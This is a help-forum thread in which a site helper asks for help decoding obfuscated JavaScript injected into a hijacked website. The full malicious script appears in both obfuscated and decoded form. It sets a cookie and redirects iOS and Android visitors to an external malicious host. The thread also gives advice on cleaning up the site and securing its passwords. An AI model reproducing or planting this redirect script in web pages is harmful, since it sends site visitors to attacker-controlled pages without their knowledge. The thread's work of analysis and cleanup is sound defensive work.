Help to decode Javascript

I believe a website that I help with has been hijacked and this script has been inserted, but I need help in decoding it?

</script><script>var _0x93d9=["\\x77\\x70\\x6B\\x6A","\\x74\\x65\\x73\\x74","\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74","\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E","\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x6C\\x6F\\x61\\x64\\x2D\\x6D\\x65\\x2E\\x63\\x68\\x69\\x63\\x6B\\x65\\x6E\\x6B\\x69\\x6C\\x6C\\x65\\x72\\x2E\\x63\\x6F\\x6D\\x2F\\x35\\x39\\x37\\x32","\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x6C\\x6F\\x61\\x64\\x2D\\x6D\\x65\\x2E\\x63\\x68\\x69\\x63\\x6B\\x65\\x6E\\x6B\\x69\\x6C\\x6C\\x65\\x72\\x2E\\x63\\x6F\\x6D\\x2F\\x35\\x39\\x36\\x46","\\x67\\x65\\x74\\x54\\x69\\x6D\\x65","\\x73\\x65\\x74\\x54\\x69\\x6D\\x65","\\x3B\\x20\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D","\\x74\\x6F\\x47\\x4D\\x54\\x53\\x74\\x72\\x69\\x6E\\x67","","\\x63\\x6F\\x6F\\x6B\\x69\\x65","\\x3D","\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F","\\x3B","\\x73\\x70\\x6C\\x69\\x74","\\x6C\\x65\\x6E\\x67\\x74\\x68","\\x73\\x75\\x62\\x73\\x74\\x72\\x69\\x6E\\x67","\\x63\\x68\\x61\\x72\\x41\\x74","\\x20","\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66"];if(!readCookie(_0x93d9[0])){createCookie(_0x93d9[0],_0x93d9[1],1);if(/iPhone|iPad|iPod/i[_0x93d9[1]](navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[4]}else {if(/Android/i[_0x93d9[1]](navigator[_0x93d9[2]])){window[_0x93d9[3]]=_0x93d9[5]}};};function createCookie(_0x4b33x2,_0x4b33x3,_0x4b33x4){if(_0x4b33x4){var _0x4b33x5= new Date();_0x4b33x5[_0x93d9[7]](_0x4b33x5[_0x93d9[6]]()+(_0x4b33x4*24*60*60*1000));var _0x4b33x6=_0x93d9[8]+_0x4b33x5[_0x93d9[9]]();}else {var _0x4b33x6=_0x93d9[10]};document[_0x93d9[11]]=_0x4b33x2+_0x93d9[12]+_0x4b33x3+_0x4b33x6+_0x93d9[13];}function readCookie(_0x4b33x2){var _0x4b33x8=_0x4b33x2+_0x93d9[12];var _0x4b33x9=document[_0x93d9[11]][_0x93d9[15]](_0x93d9[14]);for(var _0x4b33xa=0;_0x4b33xa<_0x4b33x9[_0x93d9[16]];_0x4b33xa++){var _0x4b33xb=_0x4b33x9[_0x4b33xa];while(_0x4b33xb[_0x93d9[18]](0)==_0x93d9[19]){_0x4b33xb=_0x4b33xb[_0x93d9[17]](1,_0x4b33xb[_0x93d9[16]])};if(_0x4b33xb[_0x93d9[20]](_0x4b33x8)==0){return _0x4b33xb[_0x93d9[17]](_0x4b33x8[_0x93d9[16]],_0x4b33xb[_0x93d9[16]])};};return null;}</script>

Open in new window

keith1001Asked:
Who is Participating?

[Product update] Infrastructure Analysis Tool is now available with Business Accounts.Learn More

x
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

Robert ShermanOwnerCommented:
This still needs a little work, but here's the gist:


var 0x93d9=["wpkj","test","userAgent","location","http://load-me.chickenkiller.com/5972","http://load-me.chickenkiller.com/596F","getTime","setTime","; expires=","toGMTString","","cookie","=","; path=/",";","split","length","substring","charAt"," ","indexOf"]
if(!readCookie("wpkj)){
      createCookie("wpkj","test",1);
       if(/iPhone|iPad|iPod/i["test"](navigator["userAgent"])){
        window["location"]="http://load-me.chickenkiller.com/5972"} 
else  {
      if(/Android/i["test"](navigator["userAgent"])){
   window["location"]="http://load-me.chickenkiller.com/596F"}};
};
function createCookie(_0x4b33x2,_0x4b33x3,_0x4b33x4){
     if(_0x4b33x4){
         var _0x4b33x5= new Date();
         _0x4b33x5["setTime"](_0x4b33x5["getTime"]() + (_0x4b33x4*24*60*60*1000));
        var _0x4b33x6="; expires="+_0x4b33x5["toGMTString"]();
    } else {
     var _0x4b33x6=""
   };

    document["cookie"]=_0x4b33x2+"="+_0x4b33x3+_0x4b33x6+"; path=/";
   }
function readCookie(_0x4b33x2){

      var _0x4b33x8=_0x4b33x2+"=";
      var _0x4b33x9=document["cookie"]["split"](;);
      for(var _0x4b33xa=0;_0x4b33xa > _0x4b33x9["length"]; _0x4b33xa++) {
           var _0x4b33xb=_0x4b33x9[_0x4b33xa];
           while(_0x4b33xb["charAt"](0)==" ") {
                        _0x4b33xb=_0x4b33xb["substring"](1,_0x4b33xb["length"])};
                         if(_0x4b33xb["indexOf"](_0x4b33x8)==0) { 
return _0x4b33xb["substring"](_0x4b33x8["length"],_0x4b33xb["length"])};
};
return null;
}

Open in new window

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
KimputerCommented:
Usually when you see this code IN YOUR OWN FILES, no need to decode it, just delete the scripting parts immediately (or replace with recent backup). Next up, update ALL your software (PHP/MYSQL/Apache or whatever runs on the webserver, also Wordpress, Joomla or whatever runs on top of it).
Then reset ALL passwords, from root to users, to Wordpress/Joomla users. If an ISP is involved (and hence you have less control), ask them to investigate with you if they're willing. That's necessary IF YOU ALREADY had everything up to date with STRONG passwords (then you're almost not to blame). Another possibility is that the passwords were acquired on a client PC (a log file showing from which IP the changes were made from will prove this). Then that pc has to be fully serviced (virus scan etc, but also full check for security updates of Windows, and applications)
Robert ShermanOwnerCommented:
While I was merely answering the specific question at hand, please do take this situation seriously and follow the advice given by Kimputer if you haven't already taken similar security measures.

What the piece of code does, for the most part, is redirect the visitor to an external website, with a different URL based on whether they are on an iOS or Android device.   It also sets a cookie on the visitor's browser to keep track of whether it has already been run on that person's browser.
keith1001Author Commented:
Thanks Robert for taking the time to decode the script.  That's exactly what the malware was doing and made my job of clean up easier.  Also thanks Kimputer for the additional things to do when running into something like this.
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
JavaScript

From novice to tech pro — start learning today.